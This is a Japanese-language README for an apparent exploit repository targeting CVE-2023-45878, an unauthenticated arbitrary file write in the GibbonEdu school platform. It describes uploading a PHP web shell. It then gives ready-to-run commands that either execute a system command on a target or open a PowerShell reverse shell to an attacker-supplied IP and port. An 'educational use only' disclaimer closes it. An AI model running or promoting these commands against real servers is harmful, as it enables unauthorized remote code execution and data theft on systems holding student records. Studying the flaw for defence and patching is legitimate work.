
GibbonEdu 任意ファイル書き込みからリモートコード実行
GibbonEdu 任意ファイル書き込みによるWebシェル実行
このリポジトリには、CVE-2023-45878 のエクスプロイトが含まれています。これは GibbonEdu における任意ファイル書き込みの脆弱性です。この脆弱性は rubrics_visualise_saveAjax.php エンドポイントに影響し、認証されていない攻撃者が任意のファイルをWebサーバーにアップロードすることを可能にします。
このスクリプトは脆弱性を利用して PHP Webシェル をアップロードし、次のいずれかを実行します。
このスクリプトは2つの動作モードをサポートしています。
--command (-c): 特定のシステムコマンドをリモートで実行します。--shell (-s): 攻撃者のリスナーに対してPowerShellリバースシェルをトリガーします。git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
このスクリプトは教育目的のみを意図しています。許可なくシステムでこのエクスプロイトを不正に使用することは違法です。作者は、このエクスプロイトの誤用や損害について一切の責任を負いません。